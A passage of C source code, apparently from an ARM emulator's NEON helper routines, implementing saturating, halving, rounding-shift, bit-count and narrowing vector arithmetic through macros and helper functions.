NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint16_t) NEON_VOP_ENV(qadd_u16, neon_u16, 2) #undef NEON_FN #undef NEON_USAT uint32_t HELPER(neon_qadd_u32)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a + b; if (res < a) { SET_QC(); res = ~0; } return res; } uint64_t HELPER(neon_qadd_u64)(CPUARMState *env, uint64_t src1, uint64_t src2) { uint64_t res; res = src1 + src2; if (res < src1) { SET_QC(); res = ~(uint64_t)0; } return res; } #define NEON_SSAT(dest, src1, src2, type) do { \ int32_t tmp = (uint32_t)src1 + (uint32_t)src2; \ if (tmp != (type)tmp) { \ SET_QC(); \ if (src2 > 0) { \ tmp = (1 << (sizeof(type) * 8 - 1)) - 1; \ } else { \ tmp = 1 << (sizeof(type) * 8 - 1); \ } \ } \ dest = tmp; \ } while(0) #define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int8_t) NEON_VOP_ENV(qadd_s8, neon_s8, 4) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int16_t) NEON_VOP_ENV(qadd_s16, neon_s16, 2) #undef NEON_FN #undef NEON_SSAT uint32_t HELPER(neon_qadd_s32)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a + b; if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) { SET_QC(); res = ~(((int32_t)a >> 31) ^ SIGNBIT); } return res; } uint64_t HELPER(neon_qadd_s64)(CPUARMState *env, uint64_t src1, uint64_t src2) { uint64_t res; res = src1 + src2; if (((res ^ src1) & SIGNBIT64) && !((src1 ^ src2) & SIGNBIT64)) { SET_QC(); res = ((int64_t)src1 >> 63) ^ ~SIGNBIT64; } return res; } /* Unsigned saturating accumulate of signed value * * Op1/Rn is treated as signed * Op2/Rd is treated as unsigned * * Explicit casting is used to ensure the correct sign extension of * inputs. The result is treated as a unsigned value and saturated as such. * * We use a macro for the 8/16 bit cases which expects signed integers of va, * vb, and vr for interim calculation and an unsigned 32 bit result value r. */ #define USATACC(bits, shift) \ do { \ va = sextract32(a, shift, bits); \ vb = extract32(b, shift, bits); \ vr = va + vb; \ if (vr > UINT##bits##_MAX) { \ SET_QC(); \ vr = UINT##bits##_MAX; \ } else if (vr < 0) { \ SET_QC(); \ vr = 0; \ } \ r = deposit32(r, shift, bits, vr); \ } while (0) uint32_t HELPER(neon_uqadd_s8)(CPUARMState *env, uint32_t a, uint32_t b) { int16_t va, vb, vr; uint32_t r = 0; USATACC(8, 0); USATACC(8, 8); USATACC(8, 16); USATACC(8, 24); return r; } uint32_t HELPER(neon_uqadd_s16)(CPUARMState *env, uint32_t a, uint32_t b) { int32_t va, vb, vr; uint64_t r = 0; USATACC(16, 0); USATACC(16, 16); return r; } #undef USATACC uint32_t HELPER(neon_uqadd_s32)(CPUARMState *env, uint32_t a, uint32_t b) { int64_t va = (int32_t)a; int64_t vb = (uint32_t)b; int64_t vr = va + vb; if (vr > UINT32_MAX) { SET_QC(); vr = UINT32_MAX; } else if (vr < 0) { SET_QC(); vr = 0; } return vr; } uint64_t HELPER(neon_uqadd_s64)(CPUARMState *env, uint64_t a, uint64_t b) { uint64_t res; res = a + b; /* We only need to look at the pattern of SIGN bits to detect * +ve/-ve saturation */ if (~a & b & ~res & SIGNBIT64) { SET_QC(); res = UINT64_MAX; } else if (a & ~b & res & SIGNBIT64) { SET_QC(); res = 0; } return res; } /* Signed saturating accumulate of unsigned value * * Op1/Rn is treated as unsigned * Op2/Rd is treated as signed * * The result is treated as a signed value and saturated as such * * We use a macro for the 8/16 bit cases which expects signed integers of va, * vb, and vr for interim calculation and an unsigned 32 bit result value r. */ #define SSATACC(bits, shift) \ do { \ va = extract32(a, shift, bits); \ vb = sextract32(b, shift, bits); \ vr = va + vb; \ if (vr > INT##bits##_MAX) { \ SET_QC(); \ vr = INT##bits##_MAX; \ } else if (vr < INT##bits##_MIN) { \ SET_QC(); \ vr = INT##bits##_MIN; \ } \ r = deposit32(r, shift, bits, vr); \ } while (0) uint32_t HELPER(neon_sqadd_u8)(CPUARMState *env, uint32_t a, uint32_t b) { int16_t va, vb, vr; uint32_t r = 0; SSATACC(8, 0); SSATACC(8, 8); SSATACC(8, 16); SSATACC(8, 24); return r; } uint32_t HELPER(neon_sqadd_u16)(CPUARMState *env, uint32_t a, uint32_t b) { int32_t va, vb, vr; uint32_t r = 0; SSATACC(16, 0); SSATACC(16, 16); return r; } #undef SSATACC uint32_t HELPER(neon_sqadd_u32)(CPUARMState *env, uint32_t a, uint32_t b) { int64_t res; int64_t op1 = (uint32_t)a; int64_t op2 = (int32_t)b; res = op1 + op2; if (res > INT32_MAX) { SET_QC(); res = INT32_MAX; } else if (res < INT32_MIN) { SET_QC(); res = INT32_MIN; } return res; } uint64_t HELPER(neon_sqadd_u64)(CPUARMState *env, uint64_t a, uint64_t b) { uint64_t res; res = a + b; /* We only need to look at the pattern of SIGN bits to detect an overflow */ if (((a & res) | (~b & res) | (a & ~b)) & SIGNBIT64) { SET_QC(); res = INT64_MAX; } return res; } #define NEON_USAT(dest, src1, src2, type) do { \ uint32_t tmp = (uint32_t)src1 - (uint32_t)src2; \ if (tmp != (type)tmp) { \ SET_QC(); \ dest = 0; \ } else { \ dest = tmp; \ }} while(0) #define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint8_t) NEON_VOP_ENV(qsub_u8, neon_u8, 4) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_USAT(dest, src1, src2, uint16_t) NEON_VOP_ENV(qsub_u16, neon_u16, 2) #undef NEON_FN #undef NEON_USAT uint32_t HELPER(neon_qsub_u32)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a - b; if (res > a) { SET_QC(); res = 0; } return res; } uint64_t HELPER(neon_qsub_u64)(CPUARMState *env, uint64_t src1, uint64_t src2) { uint64_t res; if (src1 < src2) { SET_QC(); res = 0; } else { res = src1 - src2; } return res; } #define NEON_SSAT(dest, src1, src2, type) do { \ int32_t tmp = (uint32_t)src1 - (uint32_t)src2; \ if (tmp != (type)tmp) { \ SET_QC(); \ if (src2 < 0) { \ tmp = (1 << (sizeof(type) * 8 - 1)) - 1; \ } else { \ tmp = 1 << (sizeof(type) * 8 - 1); \ } \ } \ dest = tmp; \ } while(0) #define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int8_t) NEON_VOP_ENV(qsub_s8, neon_s8, 4) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_SSAT(dest, src1, src2, int16_t) NEON_VOP_ENV(qsub_s16, neon_s16, 2) #undef NEON_FN #undef NEON_SSAT uint32_t HELPER(neon_qsub_s32)(CPUARMState *env, uint32_t a, uint32_t b) { uint32_t res = a - b; if (((res ^ a) & SIGNBIT) && ((a ^ b) & SIGNBIT)) { SET_QC(); res = ~(((int32_t)a >> 31) ^ SIGNBIT); } return res; } uint64_t HELPER(neon_qsub_s64)(CPUARMState *env, uint64_t src1, uint64_t src2) { uint64_t res; res = src1 - src2; if (((res ^ src1) & SIGNBIT64) && ((src1 ^ src2) & SIGNBIT64)) { SET_QC(); res = ((int64_t)src1 >> 63) ^ ~SIGNBIT64; } return res; } #define NEON_FN(dest, src1, src2) dest = (src1 + src2) >> 1 NEON_VOP(hadd_s8, neon_s8, 4) NEON_VOP(hadd_u8, neon_u8, 4) NEON_VOP(hadd_s16, neon_s16, 2) NEON_VOP(hadd_u16, neon_u16, 2) #undef NEON_FN int32_t HELPER(neon_hadd_s32)(int32_t src1, int32_t src2) { int32_t dest; dest = (src1 >> 1) + (src2 >> 1); if (src1 & src2 & 1) dest++; return dest; } uint32_t HELPER(neon_hadd_u32)(uint32_t src1, uint32_t src2) { uint32_t dest; dest = (src1 >> 1) + (src2 >> 1); if (src1 & src2 & 1) dest++; return dest; } #define NEON_FN(dest, src1, src2) dest = (src1 + src2 + 1) >> 1 NEON_VOP(rhadd_s8, neon_s8, 4) NEON_VOP(rhadd_u8, neon_u8, 4) NEON_VOP(rhadd_s16, neon_s16, 2) NEON_VOP(rhadd_u16, neon_u16, 2) #undef NEON_FN int32_t HELPER(neon_rhadd_s32)(int32_t src1, int32_t src2) { int32_t dest; dest = (src1 >> 1) + (src2 >> 1); if ((src1 | src2) & 1) dest++; return dest; } uint32_t HELPER(neon_rhadd_u32)(uint32_t src1, uint32_t src2) { uint32_t dest; dest = (src1 >> 1) + (src2 >> 1); if ((src1 | src2) & 1) dest++; return dest; } #define NEON_FN(dest, src1, src2) dest = (src1 - src2) >> 1 NEON_VOP(hsub_s8, neon_s8, 4) NEON_VOP(hsub_u8, neon_u8, 4) NEON_VOP(hsub_s16, neon_s16, 2) NEON_VOP(hsub_u16, neon_u16, 2) #undef NEON_FN int32_t HELPER(neon_hsub_s32)(int32_t src1, int32_t src2) { int32_t dest; dest = (src1 >> 1) - (src2 >> 1); if ((~src1) & src2 & 1) dest--; return dest; } uint32_t HELPER(neon_hsub_u32)(uint32_t src1, uint32_t src2) { uint32_t dest; dest = (src1 >> 1) - (src2 >> 1); if ((~src1) & src2 & 1) dest--; return dest; } #define NEON_FN(dest, src1, src2) dest = (src1 > src2) ? ~0 : 0 NEON_VOP(cgt_s8, neon_s8, 4) NEON_VOP(cgt_u8, neon_u8, 4) NEON_VOP(cgt_s16, neon_s16, 2) NEON_VOP(cgt_u16, neon_u16, 2) NEON_VOP(cgt_s32, neon_s32, 1) NEON_VOP(cgt_u32, neon_u32, 1) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = (src1 >= src2) ? ~0 : 0 NEON_VOP(cge_s8, neon_s8, 4) NEON_VOP(cge_u8, neon_u8, 4) NEON_VOP(cge_s16, neon_s16, 2) NEON_VOP(cge_u16, neon_u16, 2) NEON_VOP(cge_s32, neon_s32, 1) NEON_VOP(cge_u32, neon_u32, 1) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = (src1 < src2) ? src1 : src2 NEON_POP(pmin_s8, neon_s8, 4) NEON_POP(pmin_u8, neon_u8, 4) NEON_POP(pmin_s16, neon_s16, 2) NEON_POP(pmin_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = (src1 > src2) ? src1 : src2 NEON_POP(pmax_s8, neon_s8, 4) NEON_POP(pmax_u8, neon_u8, 4) NEON_POP(pmax_s16, neon_s16, 2) NEON_POP(pmax_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) \ dest = (src1 > src2) ? (src1 - src2) : (src2 - src1) NEON_VOP(abd_s8, neon_s8, 4) NEON_VOP(abd_u8, neon_u8, 4) NEON_VOP(abd_s16, neon_s16, 2) NEON_VOP(abd_u16, neon_u16, 2) NEON_VOP(abd_s32, neon_s32, 1) NEON_VOP(abd_u32, neon_u32, 1) #undef NEON_FN #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8 || \ tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp < 0) { \ dest = src1 >> -tmp; \ } else { \ dest = src1 << tmp; \ }} while (0) NEON_VOP(shl_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = src1 >> (sizeof(src1) * 8 - 1); \ } else if (tmp < 0) { \ dest = src1 >> -tmp; \ } else { \ dest = src1 << tmp; \ }} while (0) NEON_VOP(shl_s16, neon_s16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if ((tmp >= (ssize_t)sizeof(src1) * 8) \ || (tmp <= -(ssize_t)sizeof(src1) * 8)) { \ dest = 0; \ } else if (tmp < 0) { \ dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ } else { \ dest = src1 << tmp; \ }} while (0) NEON_VOP(rshl_s8, neon_s8, 4) NEON_VOP(rshl_s16, neon_s16, 2) #undef NEON_FN /* The addition of the rounding constant may overflow, so we use an * intermediate 64 bit accumulator. */ uint32_t HELPER(neon_rshl_s32)(uint32_t valop, uint32_t shiftop) { int32_t dest; int32_t val = (int32_t)valop; int8_t shift = (int8_t)shiftop; if ((shift >= 32) || (shift <= -32)) { dest = 0; } else if (shift < 0) { int64_t big_dest = ((int64_t)val + (1ULL << (-1 - shift))); dest = big_dest >> -shift; } else { dest = val << shift; } return dest; } /* Handling addition overflow with 64 bit input values is more * tricky than with 32 bit values. */ uint64_t HELPER(neon_rshl_s64)(uint64_t valop, uint64_t shiftop) { int8_t shift = (int8_t)shiftop; int64_t val = valop; if ((shift >= 64) || (shift <= -64)) { val = 0; } else if (shift < 0) { val >>= (-shift - 1); if (val == INT64_MAX) { /* In this case, it means that the rounding constant is 1, * and the addition would overflow. Return the actual * result directly. */ val = 0x4000000000000000LL; } else { val++; val >>= 1; } } else { val <<= shift; } return val; } #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8 || \ tmp < -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp == -(ssize_t)sizeof(src1) * 8) { \ dest = src1 >> (-tmp - 1); \ } else if (tmp < 0) { \ dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ } else { \ dest = src1 << tmp; \ }} while (0) NEON_VOP(rshl_u8, neon_u8, 4) NEON_VOP(rshl_u16, neon_u16, 2) #undef NEON_FN /* The addition of the rounding constant may overflow, so we use an * intermediate 64 bit accumulator. */ uint32_t HELPER(neon_rshl_u32)(uint32_t val, uint32_t shiftop) { uint32_t dest; int8_t shift = (int8_t)shiftop; if (shift >= 32 || shift < -32) { dest = 0; } else if (shift == -32) { dest = val >> 31; } else if (shift < 0) { uint64_t big_dest = ((uint64_t)val + (1ULL << (-1 - shift))); dest = big_dest >> -shift; } else { dest = val << shift; } return dest; } /* Handling addition overflow with 64 bit input values is more * tricky than with 32 bit values. */ uint64_t HELPER(neon_rshl_u64)(uint64_t val, uint64_t shiftop) { int8_t shift = (uint8_t)shiftop; if (shift >= 64 || shift < -64) { val = 0; } else if (shift == -64) { /* Rounding a 1-bit result just preserves that bit. */ val >>= 63; } else if (shift < 0) { val >>= (-shift - 1); if (val == UINT64_MAX) { /* In this case, it means that the rounding constant is 1, * and the addition would overflow. Return the actual * result directly. */ val = 0x8000000000000000ULL; } else { val++; val >>= 1; } } else { val <<= shift; } return val; } #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ if (src1) { \ SET_QC(); \ dest = ~0; \ } else { \ dest = 0; \ } \ } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp < 0) { \ dest = src1 >> -tmp; \ } else { \ dest = src1 << tmp; \ if ((dest >> tmp) != src1) { \ SET_QC(); \ dest = ~0; \ } \ }} while (0) NEON_VOP_ENV(qshl_u8, neon_u8, 4) NEON_VOP_ENV(qshl_u16, neon_u16, 2) NEON_VOP_ENV(qshl_u32, neon_u32, 1) #undef NEON_FN uint64_t HELPER(neon_qshl_u64)(CPUARMState *env, uint64_t val, uint64_t shiftop) { int8_t shift = (int8_t)shiftop; if (shift >= 64) { if (val) { val = ~(uint64_t)0; SET_QC(); } } else if (shift <= -64) { val = 0; } else if (shift < 0) { val >>= -shift; } else { uint64_t tmp = val; val <<= shift; if ((val >> shift) != tmp) { SET_QC(); val = ~(uint64_t)0; } } return val; } #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ if (src1) { \ SET_QC(); \ dest = (uint32_t)(1 << (sizeof(src1) * 8 - 1)); \ if (src1 > 0) { \ dest--; \ } \ } else { \ dest = src1; \ } \ } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = src1 >> 31; \ } else if (tmp < 0) { \ dest = src1 >> -tmp; \ } else { \ dest = src1 << tmp; \ if ((dest >> tmp) != src1) { \ SET_QC(); \ dest = (uint32_t)(1 << (sizeof(src1) * 8 - 1)); \ if (src1 > 0) { \ dest--; \ } \ } \ }} while (0) NEON_VOP_ENV(qshl_s8, neon_s8, 4) NEON_VOP_ENV(qshl_s16, neon_s16, 2) NEON_VOP_ENV(qshl_s32, neon_s32, 1) #undef NEON_FN uint64_t HELPER(neon_qshl_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) { int8_t shift = (uint8_t)shiftop; int64_t val = valop; if (shift >= 64) { if (val) { SET_QC(); val = (val >> 63) ^ ~SIGNBIT64; } } else if (shift <= -64) { val >>= 63; } else if (shift < 0) { val >>= -shift; } else { int64_t tmp = val; val <<= shift; if ((val >> shift) != tmp) { SET_QC(); val = (tmp >> 63) ^ ~SIGNBIT64; } } return val; } #define NEON_FN(dest, src1, src2) do { \ if (src1 & (1 << (sizeof(src1) * 8 - 1))) { \ SET_QC(); \ dest = 0; \ } else { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ if (src1) { \ SET_QC(); \ dest = ~0; \ } else { \ dest = 0; \ } \ } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp < 0) { \ dest = src1 >> -tmp; \ } else { \ dest = src1 << tmp; \ if ((dest >> tmp) != src1) { \ SET_QC(); \ dest = ~0; \ } \ } \ }} while (0) NEON_VOP_ENV(qshlu_s8, neon_u8, 4) NEON_VOP_ENV(qshlu_s16, neon_u16, 2) #undef NEON_FN uint32_t HELPER(neon_qshlu_s32)(CPUARMState *env, uint32_t valop, uint32_t shiftop) { if ((int32_t)valop < 0) { SET_QC(); return 0; } return helper_neon_qshl_u32(env, valop, shiftop); } uint64_t HELPER(neon_qshlu_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) { if ((int64_t)valop < 0) { SET_QC(); return 0; } return helper_neon_qshl_u64(env, valop, shiftop); } #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ if (src1) { \ SET_QC(); \ dest = ~0; \ } else { \ dest = 0; \ } \ } else if (tmp < -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp == -(ssize_t)sizeof(src1) * 8) { \ dest = src1 >> (sizeof(src1) * 8 - 1); \ } else if (tmp < 0) { \ dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ } else { \ dest = src1 << tmp; \ if ((dest >> tmp) != src1) { \ SET_QC(); \ dest = ~0; \ } \ }} while (0) NEON_VOP_ENV(qrshl_u8, neon_u8, 4) NEON_VOP_ENV(qrshl_u16, neon_u16, 2) #undef NEON_FN /* The addition of the rounding constant may overflow, so we use an * intermediate 64 bit accumulator. */ uint32_t HELPER(neon_qrshl_u32)(CPUARMState *env, uint32_t val, uint32_t shiftop) { uint32_t dest; int8_t shift = (int8_t)shiftop; if (shift >= 32) { if (val) { SET_QC(); dest = ~0; } else { dest = 0; } } else if (shift < -32) { dest = 0; } else if (shift == -32) { dest = val >> 31; } else if (shift < 0) { uint64_t big_dest = ((uint64_t)val + (1ULL << (-1 - shift))); dest = big_dest >> -shift; } else { dest = val << shift; if ((dest >> shift) != val) { SET_QC(); dest = ~0; } } return dest; } /* Handling addition overflow with 64 bit input values is more * tricky than with 32 bit values. */ uint64_t HELPER(neon_qrshl_u64)(CPUARMState *env, uint64_t val, uint64_t shiftop) { int8_t shift = (int8_t)shiftop; if (shift >= 64) { if (val) { SET_QC(); val = ~0; } } else if (shift < -64) { val = 0; } else if (shift == -64) { val >>= 63; } else if (shift < 0) { val >>= (-shift - 1); if (val == UINT64_MAX) { /* In this case, it means that the rounding constant is 1, * and the addition would overflow. Return the actual * result directly. */ val = 0x8000000000000000ULL; } else { val++; val >>= 1; } } else { \ uint64_t tmp = val; val <<= shift; if ((val >> shift) != tmp) { SET_QC(); val = ~0; } } return val; } #define NEON_FN(dest, src1, src2) do { \ int8_t tmp; \ tmp = (int8_t)src2; \ if (tmp >= (ssize_t)sizeof(src1) * 8) { \ if (src1) { \ SET_QC(); \ dest = (1 << (sizeof(src1) * 8 - 1)); \ if (src1 > 0) { \ dest--; \ } \ } else { \ dest = 0; \ } \ } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ dest = 0; \ } else if (tmp < 0) { \ dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ } else { \ dest = src1 << tmp; \ if ((dest >> tmp) != src1) { \ SET_QC(); \ dest = (uint32_t)(1 << (sizeof(src1) * 8 - 1)); \ if (src1 > 0) { \ dest--; \ } \ } \ }} while (0) NEON_VOP_ENV(qrshl_s8, neon_s8, 4) NEON_VOP_ENV(qrshl_s16, neon_s16, 2) #undef NEON_FN /* The addition of the rounding constant may overflow, so we use an * intermediate 64 bit accumulator. */ uint32_t HELPER(neon_qrshl_s32)(CPUARMState *env, uint32_t valop, uint32_t shiftop) { int32_t dest; int32_t val = (int32_t)valop; int8_t shift = (int8_t)shiftop; if (shift >= 32) { if (val) { SET_QC(); dest = (val >> 31) ^ ~SIGNBIT; } else { dest = 0; } } else if (shift <= -32) { dest = 0; } else if (shift < 0) { int64_t big_dest = ((int64_t)val + (1ULL << (-1 - shift))); dest = big_dest >> -shift; } else { dest = val << shift; if ((dest >> shift) != val) { SET_QC(); dest = (val >> 31) ^ ~SIGNBIT; } } return dest; } /* Handling addition overflow with 64 bit input values is more * tricky than with 32 bit values. */ uint64_t HELPER(neon_qrshl_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) { int8_t shift = (uint8_t)shiftop; int64_t val = valop; if (shift >= 64) { if (val) { SET_QC(); val = (val >> 63) ^ ~SIGNBIT64; } } else if (shift <= -64) { val = 0; } else if (shift < 0) { val >>= (-shift - 1); if (val == INT64_MAX) { /* In this case, it means that the rounding constant is 1, * and the addition would overflow. Return the actual * result directly. */ val = 0x4000000000000000ULL; } else { val++; val >>= 1; } } else { int64_t tmp = val; val <<= shift; if ((val >> shift) != tmp) { SET_QC(); val = (tmp >> 63) ^ ~SIGNBIT64; } } return val; } uint32_t HELPER(neon_add_u8)(uint32_t a, uint32_t b) { uint32_t mask; mask = (a ^ b) & 0x80808080u; a &= ~0x80808080u; b &= ~0x80808080u; return (a + b) ^ mask; } uint32_t HELPER(neon_add_u16)(uint32_t a, uint32_t b) { uint32_t mask; mask = (a ^ b) & 0x80008000u; a &= ~0x80008000u; b &= ~0x80008000u; return (a + b) ^ mask; } #define NEON_FN(dest, src1, src2) dest = src1 + src2 NEON_POP(padd_u8, neon_u8, 4) NEON_POP(padd_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = src1 - src2 NEON_VOP(sub_u8, neon_u8, 4) NEON_VOP(sub_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = src1 * src2 NEON_VOP(mul_u8, neon_u8, 4) NEON_VOP(mul_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = (src1 & src2) ? -1 : 0 NEON_VOP(tst_u8, neon_u8, 4) NEON_VOP(tst_u16, neon_u16, 2) NEON_VOP(tst_u32, neon_u32, 1) #undef NEON_FN #define NEON_FN(dest, src1, src2) dest = (src1 == src2) ? -1 : 0 NEON_VOP(ceq_u8, neon_u8, 4) NEON_VOP(ceq_u16, neon_u16, 2) NEON_VOP(ceq_u32, neon_u32, 1) #undef NEON_FN /* Count Leading Sign/Zero Bits. */ static inline int do_clz8(uint8_t x) { int n; for (n = 8; x; n--) x >>= 1; return n; } static inline int do_clz16(uint16_t x) { int n; for (n = 16; x; n--) x >>= 1; return n; } #define NEON_FN(dest, src, dummy) dest = do_clz8(src) NEON_VOP1(clz_u8, neon_u8, 4) #undef NEON_FN #define NEON_FN(dest, src, dummy) dest = do_clz16(src) NEON_VOP1(clz_u16, neon_u16, 2) #undef NEON_FN #define NEON_FN(dest, src, dummy) dest = do_clz8((src < 0) ? ~src : src) - 1 NEON_VOP1(cls_s8, neon_s8, 4) #undef NEON_FN #define NEON_FN(dest, src, dummy) dest = do_clz16((src < 0) ? ~src : src) - 1 NEON_VOP1(cls_s16, neon_s16, 2) #undef NEON_FN uint32_t HELPER(neon_cls_s32)(uint32_t x) { int count; if ((int32_t)x < 0) x = ~x; for (count = 32; x; count--) x = x >> 1; return count - 1; } /* Bit count. */ uint32_t HELPER(neon_cnt_u8)(uint32_t x) { x = (x & 0x55555555) + ((x >> 1) & 0x55555555); x = (x & 0x33333333) + ((x >> 2) & 0x33333333); x = (x & 0x0f0f0f0f) + ((x >> 4) & 0x0f0f0f0f); return x; } /* Reverse bits in each 8 bit word */ uint32_t HELPER(neon_rbit_u8)(uint32_t x) { x = ((x & 0xf0f0f0f0) >> 4) | ((x & 0x0f0f0f0f) << 4); x = ((x & 0x88888888) >> 3) | ((x & 0x44444444) >> 1) | ((x & 0x22222222) << 1) | ((x & 0x11111111) << 3); return x; } #define NEON_QDMULH16(dest, src1, src2, round) do { \ uint32_t tmp = (int32_t)(int16_t) src1 * (int16_t) src2; \ if ((tmp ^ (tmp << 1)) & SIGNBIT) { \ SET_QC(); \ tmp = (tmp >> 31) ^ ~SIGNBIT; \ } else { \ tmp <<= 1; \ } \ if (round) { \ int32_t old = tmp; \ tmp += 1 << 15; \ if ((int32_t)tmp < old) { \ SET_QC(); \ tmp = SIGNBIT - 1; \ } \ } \ dest = tmp >> 16; \ } while(0) #define NEON_FN(dest, src1, src2) NEON_QDMULH16(dest, src1, src2, 0) NEON_VOP_ENV(qdmulh_s16, neon_s16, 2) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_QDMULH16(dest, src1, src2, 1) NEON_VOP_ENV(qrdmulh_s16, neon_s16, 2) #undef NEON_FN #undef NEON_QDMULH16 #define NEON_QDMULH32(dest, src1, src2, round) do { \ uint64_t tmp = (int64_t)(int32_t) src1 * (int32_t) src2; \ if ((tmp ^ (tmp << 1)) & SIGNBIT64) { \ SET_QC(); \ tmp = (tmp >> 63) ^ ~SIGNBIT64; \ } else { \ tmp <<= 1; \ } \ if (round) { \ int64_t old = tmp; \ tmp += (int64_t)1 << 31; \ if ((int64_t)tmp < old) { \ SET_QC(); \ tmp = SIGNBIT64 - 1; \ } \ } \ dest = tmp >> 32; \ } while(0) #define NEON_FN(dest, src1, src2) NEON_QDMULH32(dest, src1, src2, 0) NEON_VOP_ENV(qdmulh_s32, neon_s32, 1) #undef NEON_FN #define NEON_FN(dest, src1, src2) NEON_QDMULH32(dest, src1, src2, 1) NEON_VOP_ENV(qrdmulh_s32, neon_s32, 1) #undef NEON_FN #undef NEON_QDMULH32 uint32_t HELPER(neon_narrow_u8)(uint64_t x) { return (x & 0xffu) | ((x >> 8) & 0xff00u) | ((x >> 16) & 0xff0000u) | ((x >> 24) & 0xff000000u); } uint32_t HELPER(neon_narrow_u16)(uint64_t x) { return (x & 0xffffu) | ((x >> 16) & 0xffff0000u); } uint32_t HELPER(neon_narrow_high_u8)(uint64_t x) { return ((x >> 8) & 0xff) | ((x >> 16) & 0xff00) | ((x >> 24) & 0xff0000) | ((x >> 32) & 0xff000000); } uint32_t HELPER(neon_narrow_high_u16)(uint64_t x) { return ((x >> 16) & 0xffff) | ((x >> 32) & 0xffff0000); } uint32_t HELPER(neon_narrow_round_high_u8)(uint64_t x) { x &= 0xff80ff80ff80ff80ull; x += 0x0080008000800080ull; return ((x >> 8) & 0xff) | ((x >> 16) & 0xff00) | ((x >> 24) & 0xff0000) | ((x >> 32) & 0xff000000); } uint32_t HELPER(neon_narrow_round_high_u16)(uint64_t x) { x &= 0xffff8000ffff8000ull; x += 0x0000800000008000ull; return ((x >> 16) & 0xffff) | ((x >> 32) & 0xffff0000); } uint32_t HELPER(neon_unarrow_sat8)(CPUARMState *env, uint64_t x) { uint16_t s; uint8_t d; uint32_t res = 0; #define SAT8(n) \ s = x >> n; \ if (s & 0x8000) { \ SET_QC(); \ } else { \ if (s > 0xff) { \ d = 0xff; \ SET_QC(); \ } else { \ d = s; \ } \ res |= (uint32_t)d << (n / 2); \ } SAT8(0); SAT8(16); SAT8(32); SAT8(48); #undef SAT8 return res; } uint32_t HELPER(neon_narrow_sat_u8)(CPUARMState *env, uint64_t x) { uint16_t s; uint8_t d; uint32_t res = 0; #define SAT8(n) \ s = x >> n; \ if (s > 0xff) { \ d = 0xff; \ SET_QC(); \ } else { \ d = s; \ } \ res |= (uint32_t)d << (n / 2); SAT8(0); SAT8(16); SAT8(32); SAT8(48); #undef SAT8 return res; } uint32_t HELPER(neon_narrow_sat_s8)(CPUARMState *env, uint64_t x) { int16_t s; uint8_t d; uint32_t res = 0; #define SAT8(n) \ s = x >> n; \ if (s != (int8_t)s) { \ d = (s >> 15) ^ 0x7f; \ SET_QC(); \ } else { \ d = s; \ } \ res |= (uint32_t)d << (n / 2); SAT8(0); SAT8(16); SAT8(32); SAT8(48); #undef SAT8 return res; } uint32_t HELPER(neon_unarrow_sat16)(CPUARMState *env, uint64_t x) { uint32_t high; uint32_t low; low = x; if (low & 0x80000000) { low = 0; SET_QC(); } else if (low > 0xffff) { low = 0xffff; SET_QC(); } high = x >> 32; if (high & 0x80000000) { high = 0; SET_QC(); } else if (high > 0xffff) { high = 0xffff; SET_QC(); } return low | (high << 16); } uint32_t HELPER(neon_narrow_sat_u16)(CPUARMState *env, uint64_t x) { uint32_t high; uint32_t low; low = x; if (low > 0xffff) { low = 0xffff; 